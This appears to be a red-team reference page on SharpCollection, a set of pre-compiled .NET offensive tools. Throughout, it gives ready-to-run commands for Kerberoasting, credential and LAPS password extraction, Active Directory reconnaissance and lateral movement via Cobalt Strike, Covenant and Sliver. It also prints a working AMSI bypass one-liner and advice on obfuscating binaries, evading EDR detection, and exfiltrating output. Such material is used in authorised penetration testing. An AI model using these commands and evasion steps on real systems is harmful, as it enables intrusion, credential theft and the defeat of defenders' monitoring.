SharpCollection
SharpCollection is a curated repository of pre-compiled .NET offensive security tools maintained by Flangvik, providing ready-to-use binaries for post-exploitation and red team operations. Rather than compiling tools on target systems, operators can download pre-built versions that are consistent, tested, and optimized for various .NET Framework versions.
Overview
Section titled “Overview”SharpCollection consolidates tools from GhostPack (by harmj0y and team) and community-developed .NET red team utilities into a single repository with nightly builds. The pre-compiled approach offers significant advantages:
- Speed: No compilation time on target systems
- Consistency: Verified working versions across different environments
- Flexibility: Multiple .NET Framework versions available (4.0, 4.5, 4.7)
- Accessibility: Pre-compiled binaries reduce dependencies and complexity
The repository is hosted on GitHub and includes tools for Kerberos exploitation, Active Directory enumeration, privilege escalation, browser credential extraction, and more.
Download and Setup
Section titled “Download and Setup”Clone the SharpCollection repository to your attack machine:
git clone https://github.com/Flangvik/SharpCollection.git
cd SharpCollection
ls -laThe repository structure is organized by .NET Framework version:
SharpCollection/
├── NetFramework_4.0_Any/
├── NetFramework_4.5_Any/
├── NetFramework_4.7_Any/
└── README.mdEach directory contains pre-compiled binaries for different target .NET versions. Explore available tools:
ls -lh NetFramework_4.7_Any/Included Tools Reference
Section titled “Included Tools Reference”| Tool | Category | Purpose |
|---|---|---|
| Rubeus | Kerberos | Kerberos ticket manipulation, ASREPRoasting, Kerberoasting, ticket renewal |
| Seatbelt | Enumeration | Local enumeration (OS, patches, antivirus, processes, network, services) |
| SharpUp | Privilege Escalation | Windows privilege escalation vector enumeration |
| Certify | Active Directory CS | Active Directory Certificate Services enumeration and exploitation |
| SharpHound | Reconnaissance | BloodHound data collector for Active Directory visualization |
| SharpDPAPI | Data Protection | DPAPI credential dumping and decryption |
| SharpChrome | Credential Extraction | Extract credentials and cookies from Chrome, Edge, Brave |
| SharpView | Active Directory | PowerView-like AD enumeration and recon |
| SharpRDP | Remote Access | RDP session enumeration and reconnaissance |
| SharpWMI | WMI Queries | WMI-based system enumeration and lateral movement |
| SharpGPOAbuse | GPO Abuse | Group Policy manipulation for privilege escalation |
| StandIn | AD Manipulation | Direct LDAP-based Active Directory modifications |
| SharpLAPS | LAPS | LAPS password extraction and enumeration |
| Snaffler | File Enumeration | High-speed file share scanning and classification |
| ADCSPwn | AD CS Exploitation | Automated Active Directory Certificate Services abuse |
| KrbRelay | Kerberos Relay | Kerberos relay attacks for lateral movement |
| SharpSCCM | SCCM Exploitation | SCCM environment enumeration and abuse |
| Whisker | Shadow Credentials | Create Shadow Credentials for AD accounts |
Basic Usage with C2 Frameworks
Section titled “Basic Usage with C2 Frameworks”Cobalt Strike
Section titled “Cobalt Strike”Execute pre-compiled tools via Cobalt Strike’s execute-assembly:
execute-assembly C:\path\to\Seatbelt.exe -group=system
execute-assembly C:\path\to\Rubeus.exe kerberoast /outfile=roasts.txt
execute-assembly C:\path\to\SharpHound.exe -c All
execute-assembly C:\path\to\Certify.exe find /vulnerableUpload tools to target:
cd NetFramework_4.5_Any
upload Seatbelt.exe
upload Rubeus.exe
upload SharpUp.exeCovenant
Section titled “Covenant”Execute via Covenant’s assembly execution:
Assembly /path/to/Seatbelt.exe -group=user
Assembly /path/to/Rubeus.exe tgtdelegSliver
Section titled “Sliver”Use Sliver’s execute command:
execute C:\Tools\Seatbelt.exe -group=services
execute C:\Tools\SharpUp.exe audit.NET Framework Version Selection
Section titled “.NET Framework Version Selection”Choose the correct binary for your target’s .NET Framework version:
| Version | Path | Compatibility | Notes |
|---|---|---|---|
| 4.0 | NetFramework_4.0_Any/ | Widest | Older Windows (Server 2008 R2, Windows 7) |
| 4.5 | NetFramework_4.5_Any/ | Most Common | Windows 8+, Server 2012+ |
| 4.7 | NetFramework_4.7_Any/ | Modern | Windows 10, Server 2016+ |
Determine target .NET version via PowerShell:
# Check installed .NET Framework versions
reg query 'HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP' /s
# Or use this command:
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' |
Select-Object PSChildName, VersionsUsing dotnet binary:
dotnet --versionWhen in doubt, use NetFramework_4.5_Any as it covers most modern Windows systems.
OPSEC Considerations
Section titled “OPSEC Considerations”Hash-Based Detection
Section titled “Hash-Based Detection”Known SharpCollection binaries are detected by EDR and antivirus solutions. Always assume hashes are catalogued:
- Never use pre-compiled binaries without modification
- Modify source and recompile for your environment
- Use binary obfuscation techniques
Obfuscation Methods
Section titled “Obfuscation Methods”Obfuscate binaries with ConfuserEx:
# Install ConfuserEx (on Windows with .NET)
# Download from: confusex.codeplex.com or use alternatives
# Using InvisibilityCloak (command-line option):
InvisibilityCloak.exe -i Seatbelt.exe -o Seatbelt_obf.exeOr use Semantic Insignificance Framework:
SemanticInformationFramework.exe input.exe output.exeAMSI Evasion
Section titled “AMSI Evasion”Pre-compiled tools may trigger AMSI. Bypass techniques:
# Disable AMSI in-memory (if unpatched):
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').
GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Then execute:
.\Seatbelt.exe -group=userAlternatively, host binaries over HTTP or load via living-off-the-land techniques.
Building from Source
Section titled “Building from Source”If pre-compiled binaries are blocked, build from source:
- Clone GhostPack repositories:
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus- Build with Visual Studio:
Open the .sln file in Visual Studio and build the solution, or use:
# Or use dotnet CLI:
dotnet build -c Release- Output binary location:
Rubeus/bin/Release/Rubeus.exeCompiling on target systems is slower but may evade binary scanning.
Useful Tool Combinations
Section titled “Useful Tool Combinations”Kerberos Attack Chain
Section titled “Kerberos Attack Chain”# 1. Find roastable users
Rubeus.exe kerberoast /format:hashcat
# 2. Extract TGT for delegation
Rubeus.exe tgtdeleg
# 3. Use ticket for lateral movement
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /ticket:[base64]Post-Exploitation Enumeration
Section titled “Post-Exploitation Enumeration”# 1. General system info
Seatbelt.exe -group=system
# 2. Find privilege escalation paths
SharpUp.exe audit
# 3. Check for LAPS passwords
SharpLAPS.exe
# 4. Enumerate AD Certificate Services
Certify.exe find /vulnerableBloodHound Data Collection
Section titled “BloodHound Data Collection”SharpHound.exe -c All
SharpHound.exe -c All --ldapusername domain.com\user --ldappassword password
SharpHound.exe -c All --zipfilename output.zipTroubleshooting
Section titled “Troubleshooting”Binary Won’t Execute
Section titled “Binary Won’t Execute”Issue: Access is denied or binary fails to run
Solutions:
- Verify correct .NET Framework version for target
- Check file permissions
- Bypass execution policy:
powershell -ExecutionPolicy Bypass -File script.ps1 - Execute via
rundll32or other LOLBins if direct execution blocked
Tool-Specific Errors
Section titled “Tool-Specific Errors”Seatbelt fails on enumeration:
# Run with specific group only
Seatbelt.exe -group=systemRubeus requires administrative context:
# Certain Rubeus commands require admin
# Check execution context first
whoami /groupsSharpHound connection issues:
# Specify LDAP server explicitly
SharpHound.exe -d domain.com -s dc1.domain.com -c AllBest Practices
Section titled “Best Practices”- Version Control: Track which binary version you’re using and document results
- Selective Execution: Run only tools needed for your operation (reduces detection surface)
- Output Handling: Redirect output to files and exfiltrate safely
- Timing: Space out tool execution to avoid behavioral detection
- Cleanup: Remove tools from target after use
- Source Builds: For critical operations, build tools from source to avoid known-hash detection
- Testing: Test obfuscated/modified binaries in lab before operational use
- Logging: Monitor target Windows Event Logs for tool execution indicators
Related Tools and Alternatives
Section titled “Related Tools and Alternatives”Source Repositories
Section titled “Source Repositories”- GhostPack: harmj0y’s original tool suite (Rubeus, Seatbelt, SharpUp)
- BloodHound-CE: Community Edition for AD visualization
- PowerView/PowerUp: PowerShell versions of enumeration and exploitation tools
Language Alternatives
Section titled “Language Alternatives”- Beacon Object Files (BOF): Faster execution in memory via Cobalt Strike
- Nim/C2: Rewrite tools in Nim for .NET avoidance
- Go Binaries: Cross-platform alternatives (winrm-go, ldap-go)
Detection Evasion
Section titled “Detection Evasion”- ConfuserEx: Obfuscate .NET binaries
- InvisibilityCloak: String encryption and code obfuscation
- NetLoader: Load assemblies directly into memory
References
Section titled “References”- SharpCollection GitHub: Maintained nightly builds
- GhostPack Suite: Original security research and tools
- Active Directory exploitation techniques
- .NET Framework documentation for version compatibility